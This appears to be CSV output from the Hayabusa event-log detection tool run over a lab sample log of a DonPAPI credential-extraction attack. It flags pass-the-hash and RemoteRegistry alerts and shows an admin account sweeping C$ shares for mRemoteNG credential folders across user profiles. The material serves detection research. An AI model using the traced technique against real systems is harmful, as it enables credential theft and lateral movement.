2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
